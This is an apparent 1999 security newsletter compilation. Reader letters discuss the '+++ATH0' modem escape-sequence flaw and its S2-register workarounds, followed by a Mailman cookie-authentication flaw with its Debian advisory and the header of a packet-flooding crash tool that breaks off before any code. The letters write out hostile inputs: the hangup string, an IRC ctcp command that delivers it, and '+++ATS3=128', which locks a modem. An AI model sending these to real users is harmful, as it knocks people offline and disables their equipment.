up: If I had a super carefully constructed ICMP message, maybe a web page with a hidden form, or a malformed client to client protocol message in an IRC session which contains '+ + +ATH0,' and some software protocol in your mac bounces it back to me.... and I can have your Mac send + + +ATH0 to its modem... the ATH0 is of course the Hayes AT command to hang up immediately. I won't even address the possibility that such a request could be used to totally alter the modem's configuration in its onboard NVRAM, which would wreak further havoc. Defense? My first reaction would be to check the value of whatever is in the S12 register of the modem. This can be checked by feeding "AT&V" into zterm or another terminal emulator when the modem is in command mode. I haven't been able to find a tester who's got an affected modem *and* a working knowledge of Zterm or any other terminal emulator, so I'm really hung up on this one- no pun intended. I am expecting to find the value set to 0. Changing this value should eliminate the problem- it will introduce guard time to the string that the modem expects to receive. Because of the nature of PPP encapsulation, the modem would never receive the command-mode string until it was legitimately sent from the PPP driver itself at the end of the session. In english, adding something like, "S12=50" to your modem init string should fix it. I can't remember what the default guard time is supposed to be, and I've switched to a DSL connection- no modems handy. One possible side effect of this fix is that if the guard time is set too high, the modem will ignore legitimate hangup requests from the PPP program. ... So far I've just seen some kids using this attack on IRC servers... they broadcast it across entire channels and see who drops off. ... From: flowerpt Date: Mon, 21 Jun 1999 10:15:02 -0400 Subject: "modem security flaw" This isn't a new problem. When I was working tech support back in '94 a few modem manufacturers were doing this, what they called TIES (Time Independent Escape Sequence). They basically skipped the guard time. Back then, it was to avoid paying royalties to Hayes, who long ago realized the guard time was essential for reliable communications. I suppose they have a patent on it. Some jolly folks on usenet had "do you need a new modem? + + +ATH" in their .sig. When people used terminal connections... I don't remember the exact figure, but when we calculated the odds of it occuring randomly, it was about once per gigabyte. At the time, that seemed huge. Now, it seems likely to occur to a good number of people each day. Hopefully, this is all just a bad INIT string. -Bill Date: Mon, 21 Jun 1999 09:10:10 -0600 Subject: Modem Security Problem... From: "Darron Froese" Ric, This is nothing new at all. Many modems on many different computers (on many different operating systems) are at risk here. Some estimate 10%-20% while others estimate it's closer to 30%-50%. Take a look at the bugtraq archives for more detailed info: 1998_3/0916.html You can follow the thread from there... -- Darron Subject: TIES modems and the escape sequence guard time Date: Mon, 21 Jun 1999 11:16:29 -0400 From: Bill Coleman AA4LR ... Hayes, did, indeed, have a patent on this technology, and they strigently defended it. Since the demise of Hayes, it is unclear who now owns this patent. As for the occurance of this problem, when I was at Hayes and the TIES modems surfaced, Hayes initiated a protracted search for documents which ended in + + +ATH. (The carriage return is required) The search proved fruitless. However, Hayes started ending all of their press releases and other documents with + + +ATH. This practice continued right up until the liquidation of Hayes earlier this year. ... Bill Coleman, AA4LR, PP-ASEL Mail: aa4lr@radio.org Date: 21 Jun 99 09:04:11 PDT From: David Anderson Subject: Modem Security Flaw Hey Ric, As you may know Global Village did not build the modems for the iMac, late model Wallstreets/Lombard or B&Ws. We did build some modems for the early Wallstreets and G3 beige boxes. QA is looking at the subject of remote denial of access as we speak and if we find anything with our modems we will post it on the web site. Subject: iMac modem security flaw -- documentation suggests otherwise Date: Mon, 21 Jun 1999 15:16:45 -0400 From: Josh Brannon I have an iMac and have not yet had an opportunity to test the modem security issue you documented today (6/21/99), but with the iMac came a document called "AT Commands.pdf" that documents the AT Commands for the "Apple Internal Modem" (whatever that means -- iMac is never explicitly stated), and in it it states clearly, "In order to prevent the modem from responding to '+ + +' (called the 'escape sequence') it requires a one second pause before and after the sequence. Without the pause, the modem treats the '+ + +' sequence as data rather than a command." This seems to be at odds with the reports that users are giving, and if nothing else suggests that the security issue documented is not how Apple intended the modem to work. Josh Brannon Date: Mon, 21 Jun 1999 19:25:21 -0400 From: Jack Rodgers Subject: GV Modems and A T H After reading the comments on send + + + A T H to some modems, I tried to send myself an email with the subject and body being "+ + + A T H" minus the quotes and spaces. The sending disrupted the modem and seemed to cause a cycling on and off. This is on a new B&W 400 Mhz G3 and a newly installed GV Teleport Internal 56K modem and Eudora Pro 4.2 beta. So, who's at fault? The GV Modem, Eudora.... Jack Rodgers Subject: Modem Security Flaw Date: Mon, 21 Jun 1999 11:57:07 -0700 From: Travis Beals In response to one of the emails posted in the discussion about the Modem Security Flaw, I did a quick check on my Rev. A iMac's modem. Using Microphone LT, I used the AT&V command to check the value of the S12 register, and found that it defaults to 50, not 0, as some had supposed. Other than installing the standard Apple modem firmware updates, I have made no modification to my modem's settings. I also checked the iMac 56K modem script to make sure it does not set S12 to 0 (it doesn't). Although I have not (to my knowledge) experienced the modem DoS (denial of service) attack, I do not know whether my modem is immune. If the guard time of 50ms specified in S12 is correctly implemented, there SHOULD be no problem. -Travis Subject: Modem Security Flaw Date: Mon, 21 Jun 1999 23:18:40 -0500 From: Marcus Aanerud I just wanted to confirm the modem security flaw with a Global Village 56K modem (Upgraded to V.90). As an experiment, I sent an e-mail with the escape code at the end of it, including the carriage return, and it promply kicked me offline, just as it was supposed to be done sending the message. Heh... whoops! Marcus Aanerud Subject: Re: Modem Security Flaw Date: Mon, 21 Jun 1999 10:52:43 -0500 From: Jonathan 'Wolf' Rentzsch Greetings! ... About "Modem Security Flaw". Assuming you can execute arbitrary modem commands remotely, here's a great command: "+ + +ATS3=128". This takes the modem offline ("+ + +"), and sets the first newline character to decimal 128 ("S3=128"). It turns out the modem uses newline character to determine when a command has been completed and executed. Usually this value is set to 13, which is the ASCII code for "return". However, modems will strip the high bit of incoming ASCII characters in command mode. This act makes it impossible to send characters through to the modem whose value is greater than decimal 127. You've just made it impossible to execute *any* commands sent to the modem. On external modems, you need to cycle the modem's power switch to get your modem back. On a computer with an internal modem (iMac, B&W G3), you need to restart! -- Jonathan 'Wolf' Rentzsch Date: Tue, 22 Jun 1999 10:49:42 -0400 From: Aaron Bratcher Subject: Modem Security Flaw I purchased an Apple G3 Internal modem after purchasing my blue/white G3 Tower. Someone on the IRC showed me how they could control my modem using the /ctcp command that was described by another reader. (btw: I cannot even put that command into this e-mail message because I am dialed up and it causes a disconnect when I send it) Unfortunately, it is not because of the S12 register contents. After reading about that possibility, I downloaded ZTerm to check and found that my S12 register was set to 50. As a further check, I modified my modem script to set the S12 register to 50 just before dialing in. This too had no effect. Apparently this is a bigger bug than simply an init string. This shows that there are problems in the firmware. -- Aaron Bratcher Date: Wed, 23 Jun 1999 01:38:25 -0500 From: pasupati Subject: modem hangups This hangup problem affects motorola modemsurfer 56k modem upgraded to V90... I set S12=50 and it doesnt correct the problem. Motorola is out of the modem business so there is no help on their site. Date: Tue, 22 Jun 1999 22:49:30 -0700 From: filmman Subject: Modem Security Flaw I've confirmed the security flaw with my Global Village 56K external modem (upgraded to v.90). I sent myself an email with the "+ + + A T H " command (minus the quotes and spaces) followed by a carriage return, and I was immediately knocked offline as the message was sent. Using zterm, I used "AT&V" to check the S12 register, and it is 050. So apparently, the guard time of 50ms doesn't prevent the modem from being disconnected. Either that, or it's not being implemented for some reason. Interestingly, while I was reading your reader reports on the security flaw, I was knocked offline! Laz Date: Tue, 22 Jun 1999 20:06:26 -0400 From: Scott Lahteine Subject: Modem Security Flaw Re the modem security flaw: I had a problem months ago where a friend had sent the + + + A T H inside an email, and for a week I thought my ISP was hanging up on me! I finally tracked it down to the code in the email, and promptly cringed. My modem is a SupraExpress 56K external, and I'd guess that many other modems are afflicted. Scott Lahteine Date: Wed, 23 Jun 99 12:36:12 CST Subject: Modem Flaw From: (JOSH BARTON) I tried to look at the page regarding modem flaws. I kept getting disconnected while trying to view the page. I found that most odd. Every time it started to load my modem would disconnect. As it turns out, all of the examples on the page were tripping the modem just as the flaw said. I am using a Global Village Speakerphone 33.6. I worked around it by dialing into my ARA server and using MACIP to tunnel the IP stuff into my appletalk protocol. I found it interesting that something just posting in the html would be able to disconnect the modem. This leaves the door open for a hacker to put hidden code into a web page that could permanently disable a global village modem by disrupting it's ROM image. Josh Barton Date: Thu, 24 Jun 1999 05:58:19 +1000 From: David Monroe Subject: KILLING MY MODEM I don't know what you had on the modem report page - I tried several times to read it but my express modem disconnected and PPP froze up. No problems elsewhere - just on this link. David Monroe Boda Farm BELLTHORPE 4514 Australia Date: Wed, 23 Jun 1999 18:07:13 -0500 From: Matt Subject: Modem Flaw Well it appears the flaw is not limited to just GV modems. I have a BestData 56k Speakerphone modem connected to a SuperMac S900, and emailed myself the + + + A T H command in the subject and the body and was kicked offline immediately. "Widespread problem" could be an understatement with something so simple able to kick so many people. Many thanks to MacInTouch for making us aware of this and providing workarounds for it. Matt Perkins Michigan USA Date: Wed, 23 Jun 1999 18:18:45 -0700 From: John W Baxter Subject: Modem escape sequence note (ongoing discussion) Some readers have mentioned that S12 does contain 50 on certain modems. Others have mentioned that the same modems have the escape sequence A T H flaw. And one reader set S12 to 50 and found that doing so didn't help. None of this is surprising: a modem may very well implement S12 and let it hold values without using the register for anything. On a modem with the usual implementation of the guard time for the + + + escape sequence, S12 contains the time. On modems which don't implement the guard time, S12 holds a number unrelated to the escape sequence--and probably unrelated to anything else. --John Date: Wed, 23 Jun 1999 23:03:04 -0400 From: Carl Foner Subject: Help First off, I love MacInTouch. It's about as much a daily ritual as brushing my teeth. I read with interest the note about modem problems. I clicked on the link to read the story, it started loading, but then my ppp connection dropped. I thought it was odd, so I tried it again. Same problem. It happened another 10 or so times, before I tried going through several diagnostics, checking settings, cables, etc. After no luck I went back online and tried looking at some other stuff. No problem. I went around for 10 or 20 minutes andthings were fine. Then, I went back to the modem problems story. In about 10 seconds my connection dropped. I tried a couple more times and got the same response. I'm sure you'll agree that my modem having trouble getting to a story about modem trouble, is more than a little ironic. Any thoughts? Thanks, Carl Foner Date: Wed, 23 Jun 1999 17:19:44 -0500 Subject: "modem flaw" From: "Robert Westerman" Whenever I click on the link for "modem flaw" it drops my connection and I can never make it to the article. This really is a modem flaw. Is it me or is it memorex??? Thank you, Robert Westerman Date: Thu, 24 Jun 1999 23:46:53 +0100 Subject: Macintosh Modem Woes From: "John Gibbs" Ric, Just on a whim I tried sending the "+++" "ATH" commands to myself, via email... As you can see from the way I wrote them, they caused my modem to hang up immediately. The odd thing is, my modem is a generic V.90 modem for the PC. The brand itself is DCS or some such, I picked it up at a local computer (read PC) fair here in London. I guess it uses the same chipset as Apple's/GV's (I believe my unit uses a Rockwell chipset).. It would seem that this bug affects a good number of modems. However, the good news is that Massimo Valle's tip works great even on el-cheapo no-name modems like mine.. I think I speak for everyone when I give a whole-hearted THANKS! to Massimo. Regards, -John London, UK Date: Thu, 24 Jun 1999 11:36:50 -0400 From: Yann Subject: Modem flaw on SupraExpress 56k too Hi! The string "+ + + A T H", without the spaces, when sent in the subject line of an e-mail message, with Eudora Light, disconnected my Diamond Multimedia SupraExpress 56k V.90 immediately. Adding S2=127 to the init string fixes it. Apple and Diamond need to release fixed ARA scripts for this ASAP. - Yann Duguay Date: Thu, 24 Jun 1999 23:12:55 -0400 From: Richard Outerbridge Subject: modem flaw weaselling 1999-06-24 22:57:46 EDT The devil is in the details... the Apple pdf file describing modem commands ("AT Commands for the Apple Internal Modem") only promises that the S12 register will control the modem's response to the escape sequence. Quote: S12 register (Guard time) .... If any characters are detected during this time, the OK will not be sent. Note that sending of the OK result code does not affect entry into command mode. In other words, my modem, which exhibits the DOS vulnerability, is behaving exactly according to its specifications: the value in S12 only determines whether or not the modem sends back OK in response to the escape sequence, NOT whether or not it enters command mode in response to the escape sequence. I detect the presence of patent lawyers... class-action lawsuit, anyone? And yes, adding "S2=128" to all my init strings seems to be an effective workaround for my purposes. outer Date: Thu, 24 Jun 1999 22:42:42 -0500 From: Brian Alletto Subject: modem security flaw Add the Zoom 56K Dualmode modem, model 2945 to your list of modems affected my the security flaw. Brian Alletto balletto@sprintmail.com Date: Thu, 24 Jun 1999 19:46:50 -0700 From: Joe Subject: Modem Security Flaw & Viking Modems Hi Guys, Guess what? My new Viking External v.90 modem has the bug. I could not send email to myself with the subject : + + + A T H....Got knocked off immediately, but had no problem sending the escape command in the body of the message. I'm calling Viking right now and digging out the ole trusty Hayes Optima 33.6 Thanks for the tip.......Keep up the good work. Joe Workarounds Date: Mon, 21 Jun 1999 14:26:26 -0400 Subject: iMac escape code From: "Chris Dembitz" For iMac users using Ircle (an irc client) the excellent freeware irc script package Hipscript will protect against any /ctcp-based DoS attack that uses the + + + code, in addition to providing many other useful features. I personally tested this with an iMac today, and it worked flawlessly. Chris From: Richard Smith Subject: Modem Security Flaw Date: Wed, 23 Jun 1999 13:28:18 +1200 Another S register to be aware of (like s12 for the guard time) is s2 this is the register that actually hold the escape character, there is no reason why you cannot change that to something other than a +. decent PPP modem control software should allow you to change this setting within them without a problem. ie ATS2=27 (27 is the escape key on the keyboard, cannot remember what the + is at them moment, but using AT&V should tell you (assuming + is still set)) Regards Richard Smith Customer Support The Zones Online Subject: modem security flaw - the final workaround Date: Wed, 23 Jun 1999 09:05:04 +0200 From: Massimo Valle I want to confirm the modem security flaw. On my iMac receiving a ctcp ping + + +ATH0 cause the modem to disconnect. Also sending a "/ctcp nickname ping + + +ATH0" to another user, cause my iMac modem to disconnect. I have a workaround that work apparently without side effects. The tip is to disable the escape sequence "+ + +" setting the S2 register to 127. This is the correct setting for disabling the escape sequnce, as reported on the "AT commands" manual. I've modified the original iMac modem script adding S2=127 and all seem work fine. Sending and receiving a ctcp ping with + + +ATH0 no more disconnect my iMac modem. Also the PPP disconnect correctly when I request "Disconnect" from Remote Access. I think this work also for G3 and Powerbook G3. enjoy it!! Massimo Valle ITALY Date: Wed, 23 Jun 1999 18:34:25 -0500 From: Matt Subject: Modem Flaw Workaround Works! Another note for your readers: Massimo Valle's solution of adding S2=127 to the modem init string works great. I tested it twice by removing the string and re-sending the + + + A T H command to myself email...kicked right off immediately. Replaced the sequence in the init string, sent again, nothing at all happened, it sent normally. Thanks Massimo!! Matt Perkins Michigan USA Date: Thu, 24 Jun 1999 01:46:31 -0400 Subject: modem flaw -- followup From: "Jason Y. Kim" Confirmed! Setting S2 register to 128 (manual says anything ABOVE 127 will work) fixed the modem problem on my iMac. I can now send email to myself with the modem hangup command in the subject line and body without getting immediately disconnected. And I can still disconnect manually whenever I want. THANK YOU MACINTOUCH. --argonaut Date: Thu, 24 Jun 1999 12:38:24 -0400 Subject: iMac Modem Security Fix ready for download From: "Chris Dembitz" To: Ric Ford I have modified the two iMac modem scripts with the suggested modification of adding S2=128 to the init string. I made an Applescript installer that will replace the older versions with these (unsupported) modified versions. It is available at [imacscriptupdate.sit] It is in Stuffit 5 format. Please note this is an unsupported, unwarranteed fix. Hope this helps -- Christopher J. Dembitz General Manager NetRamp Internet Services, Inc. Tidewater, Virginia's Only All-Mac ISP Date: Fri, 25 Jun 1999 10:24:56 -0400 Subject: Update to script update From: "Chris Dembitz" I have updated the iMac script update installer so it now gives the option to reinstall the old scripts (since those were getting copied over without being backed up). The url to download it has not changed. Chris Date: Thu, 24 Jun 1999 22:30:56 -0400 From: Cristian Subject: Quick Guide: Solving Modem Bug (DoS) Hi Ric! Thanks for such a good followup on the Modem Bug... After spending an hour trying to understand what exactly should be done on my Internal Apple 56k modem (350 BW G3) to fix the problem, I concluded: 5 easy steps: 1.Get offline! 2.Launch Zterm (or similar terminal program) 3.Type ATZ enter (resets modem to default settings) 4.Type ATS2=128 enter (sets S2 register to 128, disabling escape sequence) 5.Type AT&W&W1 enter (stores the new settings to default) Now, to verify this worked, switch your modem off/on (or shutdown if internal). Open Zterm, type ATZ enter and then type AT&V enter. This will display your default settings. You want S2 (or S02) to be equal to 128. You'd probably read: S02:128 -Cristian Viola. Date: Thu, 24 Jun 1999 11:48:32 -0700 From: Jim Stoneburner Subject: Modem workaround problems; Hangup delay solution Hello, (1) Modem flaw workaround causes problems I tried some of the recommended workarounds and found that it made my modem unusable _depending_ on which modem script I use. My modem is a Global Village Modem x2 56k external, on a PowerCenter running OS 7.6.1 and OT/PPP 1.0.1. I have two modem scripts for ARA 2.1/OT-PPP on hand, two different generations of x2 scripts from Global Village. The version 1.0.9 script worked great after I added "S2=127" to the init string (just after "S0=0"), solving the undesired disconnects if I try to send an email containing "+ + + ATHO". However, version 1.0.7 would not work. When trying to dial, the menubar "speedometer" would show data burst at 2 or 3 per second, and the process would stall. Sometimes, a restart was required to escape the process. I tried this with "S2=128", and in different places in the string of AT commands, but no luck. (2) Hangup delays: a possible solution Normally, I would simply use the newer script, especially since it functions with the "S2=127" workaround. However, the older script disconnects _much_ faster than the new one -- 2 seconds as opposed to 10. I don't understand enough about these scripts to tell why the earlier version doesn't work with the modification, or why it disconnects more rapidly. Being an experimental scientist, I tried a few things.... First, I read the scripts and identified the few differences between them. I then did some experimentation by commenting out or swapping out code. This narrowed down the cause of slow disconnects to a section near the end of the script labeled "Hang up and reset the modem." (The init string made no difference, by the way.) The revision list at the top of the v1.0.9 script includes the entry: ! 1.0.8 06/11/97 GAS Fixed hang up code and added TIES support So, I tried replacing the subsection in v1.0.9 labeled Escape from data to command mode using TIES + + + AT\13 command with one from the older v1.0.7 script labeled: Escape from data to command mode using standard + + + command. This eliminated most of the hangup delays. Restoring the newer code, I then experimented with simply shortening the "pause" statements in this section, but this was not enough to noticably shorten the delay. Perhaps one of your readers can help us understand the benefits of the newer code (if any), and how to speed up the disconnects now that a major cause has been identified. I'd also be interested in whether other readers can confirm these observations. At present, I am stuck either with the newer script with its slow disconnects but a successful workaround to the defect, or the older script with its fast disconnects but no workaround. Best wishes, Jim Attachment 1: Hang up code from v1.0.9 of Global Village x2 script ! Escape from data to command mode using TIES + + + AT\13 command ! pause 60 write "+++" pause 30 matchclr matchstr 1 96 "OK\13\10" pause 15 write "AT\13" matchread 60 ! @LABEL 94 ! Force a hangup matchclr matchstr 1 98 "NO CARRIER\13\10" matchstr 2 98 "OK\13\10" matchstr 3 98 "ERROR\13\10" matchstr 4 98 "0\13\10" matchstr 5 98 "DELAYED" matchstr 6 98 "BLACKLISTED" write "ATH\13" matchread 30 ! ! Try again to get control of the modem by toggling DTR ! DTRClear Pause 5 DTRSet flush ! ! ! Try the hangup sequence three times otherwise declare an error inctries pause 120 iftries 3 101 jump 91 ! @LABEL 96 ! Pause between data and command mode pause 50 jump 94 ! ! @LABEL 98 pause 15 matchclr matchstr 1 99 "OK\13\10" write "AT&F1E1\13" matchread 30 jump 101 ! @LABEL 99 exit 0 ! ! Attachment 2: Hangup code from v1.0.7 of "GV x2 for ARA 2.1/OT-PPP" ! ---- Hang up and reset modem ---- ! @HANGUP ! ! If we do this too long, exit. iftries 1225 99 ! @LABEL 90 ! settries 0 HSReset 0 0 0 0 0 0 ! @LABEL 91 ! ! Try to get control of the modem ! DTRClear Pause 5 DTRSet flush ! @LABEL 94 ! ! Force a hangup ! matchclr matchstr 1 98 "NO CARRIER\13\10" matchstr 2 98 "OK\13\10" matchstr 3 98 "ERROR\13\10" matchstr 4 98 "0\13\10" matchstr 5 98 "DELAYED" matchstr 6 98 "BLACKLISTED" write "ATH\13" matchread 30 ! ! Try again to get control of the modem by toggling DTR ! @LABEL 95 DTRClear Pause 5 DTRSet flush ! ! ! Escape from data to command mode using standard +++ command ! matchclr matchstr 1 96 "OK\13\10" pause 15 write "+++" matchread 15 ! ! ! Try the hangup sequence three times otherwise declare an error ! inctries iftries 3 101 jump 95 ! @LABEL 96 ! ! Pause between data and command mode ! pause 50 jump 94 ! ! @LABEL 97 ! ! AT&F1 resulted in Error, try again using AT&F ! pause 15 matchclr matchstr 1 99 "OK\13\10" write "AT&FS0=0\13" matchread 30 jump 101 ! @LABEL 98 ! ! Got control of the modem. Recall the factory settings. If it fails, jump 97. ! pause 15 matchclr matchstr 1 99 "OK\13\10" matchstr 2 97 "ERROR\13\10" write "AT&F1S0=0\13" matchread 30 jump 101 ! @LABEL 99 exit 0 ! ! Date: Fri, 25 Jun 1999 07:58:28 -0400 Subject: Modem Security flaw From: Steve Crossman Hi Ric, I just wanted to say that the S2=127 added to the initialization string of my modem in my G3-233 Wallstreet PowerBook has fixed the problem you had described. I also don't get knocked offline anymore, which was so frequent that I thought I had a bad modem or phone line. It is hard to believe GV & Apple could engineer something like this into the PB with this kind of problem. Thanks to your page for the fix. Steve Crossman Date: Thu, 24 Jun 1999 21:05:59 -0400 From: M J McCaffrey Subject: GV 56K + + + ATH fix script Ric-- I have successfully modified the "PowerBook G3 Internal 56K" ARA connect script to implement the S2 register setting described by several readers as a "fix" for the guard-time attack. I have tested it on my own system (a PowerBook G3 Series/250 with the 56K internal modem) both with the original script and the modified script, and am satisfied it fixes the problem. (I tested by sending an e-mail to myself with the problem string in the body of the message -- sure enough, with the original I'm knocked offline immediately, and with the modified script it's no longer a problem.) I have posted the script at the following URL: /modemFix/index.html The script itself is about a 40K download. Please consider making this available to your readers in your next edition. Thanks! --Matt McCaffrey PS: I have had this problem since I started using my internal modem on 56K lines, and it has bugged the living daylights out of me. Thank you for helping get the word out! (And as always, thanks for MacInTouch!) Date: Fri, 25 Jun 1999 17:38:02 -0700 From: Kent Sorensen Subject: Snak version 3.0.1 is released - IRC Client for Mac Dear Editor, Snak is a full featured IRC client with some unique and very useful features. It's fast, efficient and easy to use, and it is being updated and enhanced regularly. Version 3.0.1 has now been released and can be downloaded from [www.snak.com] This version blocks the so-called ATH attack from disconnecting your modem via IRC. The attack uses a flaw in some modems to cause it to disconnect, by sending it a particular string of text. This string is now stopped and changed, so the modem will not react to it. ... From: Mitchell Burnside Clapp Date: Fri, 25 Jun 1999 13:17:31 EDT Subject: Modem Guard Mode/Security defect: Fix for AOL users For AOL users, the modem script in the system folder is apparently never called. The AOL client does its own modem configuration. To implement the S2=128 fix discussed on MacInTouch, you need to select the setup button from your sign on screen. Select the "Expert Setup", "Edit," "Modem Options," and "Advanced settings" buttons in order. Type the characters "S2=128" at the end of the string of letters in the "Configuration" box. Save your way back out to the sign on screen. (You may be asked to save the modem settings as a copy under a new name. I called mine "GV Internal modem 56K fix" and double-checked to make sure it was selected as the modem for the location I was editing). I was able to send myself e-mail containing the infamous "+ + + A T H" sequence without getting dropped, whereas before it was a reliable way of kicking me off-line every time. Mitchell Burnside Clapp CEO Pioneer Rocketplane Background Information From: "Wong,Robert Subject: modem guard problem Date: Thu, 24 Jun 1999 10:35:53 -0700 Hi, A long time ago, I used to administer the ZyXEL modem FAQ. One of the questions was about how the ZyXEL modems dealt with the modem guard sequence. If you read onwards, you will notice an excerpt from BoardWatch mag. This exerpt describes how ZyXEL got around the Hayes patent. RWW. Subject: T.6 How do ZyXEL modems deal with escape sequences? Byte Magazine, V18, N8, July 1993, pg 184 has a good background article about escape sequences. The information below is a less technical explanation of escape sequences. An escape sequence switches a modem from transmission mode to command mode. Sometimes, an AT command needs to be issued to the modem when it is on-line and connected with another modem. Since the modem is on-line, typing an AT command would send the AT command down the connection to the other modem. Thus the local modem never receives and acts on the AT command. An escape sequence is needed to bring the local modem into command mode (without dropping the connection to the other modem). One escape sequence is to drop the DTR (Data Terminal Ready) signal on one of the wires in the serial cable. This is a reliable escape sequence. Some hardware platforms do not have a wire for the DTR signal and therefore cannot perform this escape sequence. Another type of escape sequence is needed. An alternate escape sequence is a pause, followed by three escape characters, and then another pause. This escape sequence then puts the modem into command mode, allowing entry of AT commands. (The pauses prevent the modem from mistaking escape characters in the data stream for "true" escape characters in an escape sequence.) Hayes has a patent on the pause, escape characters, and pause technique. Other modem manufacturers are required to pay royalties to Hayes for use of its patent. Some modem makers are not using the Hayes patent or any other method of distinguishing real escape characters. This causes factory configured modems from these modem manufacturers to inadvertently go into command mode when the Hayes test file is transmitted. Taken from Byte Magazine, V18, N8, July 1993, pg 184 without permission: "Zyxel [sic] has its own algorithm, for which it claims compatibility with existing code. Since the Zyxel [sic] algorithm is proprietary, we can't comment on its strength or weakness. However, it caused no problem in our testing." Taken from BoardWatch Magazine, V6, N9, November 1992 without permission: "To illustrate the technical elegance of this [ZyXEL] modem, recall our article on the Hayes brouhaha over their fixed guard time escape sequence under the Heatherington 302 patent. Hayes has licensed numerous modem manufacturers to use this escape sequence. A few have not licensed it and often, their modems will escape to command mode while transmitting files containing +++ escape sequences. Hayes caused something of a furor in July by releasing a text file that if transmitted by many modems that don't use the guard time escape sequence technique, would abort the transfer and improperly escape to command mode. Multitech's modems fail the test rather awkwardly. The ZyXEL modem does NOT license the Hayes escape sequence. According to Gordon Yang, they use a proprietary variable sampling algorithm that does the job at least as well. We tried the ZyXEL on the Hayes test file - and sure enough, it worked like a champ. ZyXEL appears to have engineered a way around the escape sequence controversy. Yang indicates that they could conceivably publish the algorithm. If they did, this would take some serious steam out of the Hayes licensing program." Robert Wong O'Reilly's dictionary of data communications terms includes a discussion of escape guard systems under "TIES" - Time Independent Escape Sequence 100.0 Another government server cracked today ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 26th From www.403-security.org Another NASA site got hacked Astral 26.06.1999 22:25 Today another NASA site was hacked today it is http://microgravity.msfc.nasa.gov/ this time. Keebler, he hacked all this government sites in last few weeks. This is just another hacked site in a serial of government website hacks. Check archive of this hack in Hacked Sites section. http://www.403-security.org/Htmls/hacked_sites.htm @HWA 101.0 MailMan.cookie attack ~~~~~~~~~~~~~~~~~~~~~ June 26th from PacketStorm Security http://www.python.org/pipermail/mailman-developers/1999-June/001128.html John Morton jwm@plain.co.nz Thu, 10 Jun 1999 18:14:42 +1200 (NZST) [Didn't see this problem discussed in the recent archive messages, so...] I was looking at the code for the admin cgi in search of a good cookie authentication system, and found out that it was doing this, c = Cookie.Cookie( os.environ['HTTP_COOKIE'] ) if c.has_key(list_name + "-admin"): if c[list_name + "-admin"].value == `hash(list_name)`: return 1 ...to authenticate based on a cookie. This code is from 1.0b8, but it only took a couple of minutes to set the appropriate wafer in my junkbuster configuration, and point netscape at the admin page for mailman-developers. I'll leave the replication of this exploit as an exercise for the readers. Possible solutions: Lock down that url with whatever security features your web server has. This sucks as a long term solution, but it should protect from disgruntled script kiddies that you just chucked off your lists. Make the value based on a hash of some slow changing system variable. Something that changes with the frequency of your desired expire time, for example. Maybe a cron job to set a key based on some fast changing system stats every hour or so. Use SSL for the admin interface and save the name and password in the cookie. Any better suggestions? John. --------------------------------------------------------------------------- Date: Tue, 22 Jun 1999 21:06:34 -0700 From: debian-security-announce@LISTS.DEBIAN.ORG Reply-To: security@debian.org Subject: [SECURITY] New versions of mailman fixes cookie attack -----BEGIN PGP SIGNED MESSAGE----- We have become aware that the version mailman as supplied in Debian GNU/Linux 2.1 has a problem with verifying list administrators. The problem is that the cookie value generation used was predictable, so using forged authentication cookies it was possible to access the list administration webpages without knowing the proper password. More information about this vulnerability can be found at http://www.python.org/pipermail/mailman-developers/1999-June/001128.html This has been fixed in version 1.0rc2-5. We recommend you upgrade your mailman package immediately. wget url will fetch the file for you dpkg -i file.deb will install the referenced file. Debian GNU/Linux 2.1 alias slink - -------------------------------- This version of Debian was released only for Intel, the Motorola 680x0, the alpha and the Sun sparc architecture. Source archives: http://security.debian.org/dists/stable/updates/binary-source/mailman_1.0rc2-5.diff.gz MD5 checksum: 096d96ebf89341b148d2ae917037559a http://security.debian.org/dists/stable/updates/binary-source/mailman_1.0rc2-5.dsc MD5 checksum: a407c72b6d80163b04ddc5fb895b8fbd http://security.debian.org/dists/stable/updates/binary-source/mailman_1.0rc2.orig.tar.gz MD5 checksum: 6916959db9144ecaf004fcd9be32a020 Alpha architecture: http://security.debian.org/dists/stable/updates/binary-alpha/mailman_1.0rc2-5_alpha.deb MD5 checksum: 0f053b62d9dd51d4e2c0843258eee453 Intel ia32 architecture: http://security.debian.org/dists/stable/updates/binary-i386/mailman_1.0rc2-5_i386.deb MD5 checksum: d9b0f93458a41055ba1b39891e0a5ca5 Motorola 680x0 architecture: http://security.debian.org/dists/stable/updates/binary-m68k/mailman_1.0rc2-5_m68k.deb MD5 checksum: 94fc7996e4b296a4c944fe08ccb44503 Sun Sparc architecture: http://security.debian.org/dists/stable/updates/binary-sparc/mailman_1.0rc2-5_sparc.deb MD5 checksum: e27d100b24d0c87c02cc86b7aadded0d These files will be copied into ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon. Please note you can also use apt to always get the latest security updates. To do so add the following line to /etc/apt/sources.list: deb http://security.debian.org/ stable updates - -- Debian GNU/Linux . Security Managers . security@debian.org debian-security-announce@lists.debian.org Christian Hudon . Wichert Akkerman . Martin Schulze . . -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQB1AwUBN3Av9KjZR/ntlUftAQFFjwL/VwNslEzha3yT4k3wwDSedm0XEiHIUCS1 +ngWFIrPnLzfJ/jK2atXAZc98wwFxjxOTDWnGuc4RBjRi4NqBduQsVwaIHelSbK2 u9uPiNvzUhPiCUdzDusjy8ysUmzJIHd8 =PgQB -----END PGP SIGNATURE----- -- To UNSUBSCRIBE, email to debian-security-announce-request@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org @HWA 102.0 misfrag.c nasty piece of code from P.A.T.C.H ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /******** ***** ********* ***** * * * * * * * * * * * * ******** * *** * * * * *** * * * * * * * * * [*] * * [*] * [*] ****** [*] * * [*] P e o p l e A l l - f o r t o o l s c a u s i n g h e l l */ /********************************************************************* * * P.A.T.C.H. * t h e b r i g a d e * [http://thebrigade.8m.com] * * coded by misteri0 from P.A.T.C.H. * [mailto:leet@ibw.com.ni] * * Description: [ Sends 2 packets per packet that you give out ] * [ and per every packet it increments the dest/source port by 1 ] * [ the packets are spoofed, and it sends 1 packet using TH_SYN and another with TH_ACK ] * [ crashes operating systems: Windows NT4 / Win95 / Win98 ] * [ crashed a Windows NT4 / Win95 / Win98 from my computer sending 2000 packets starting from 0 ports ] * greets: codesearc, Nforcer, Punk182, everyone in #ehforce, Evilfurby, ^clAw^ * people in #bitchx, folks in #c, and the lame people in #nicaragua for being such dicks * with me which if it wasn't for them I would not have decided to code * fuck u's: Ellison you stupid 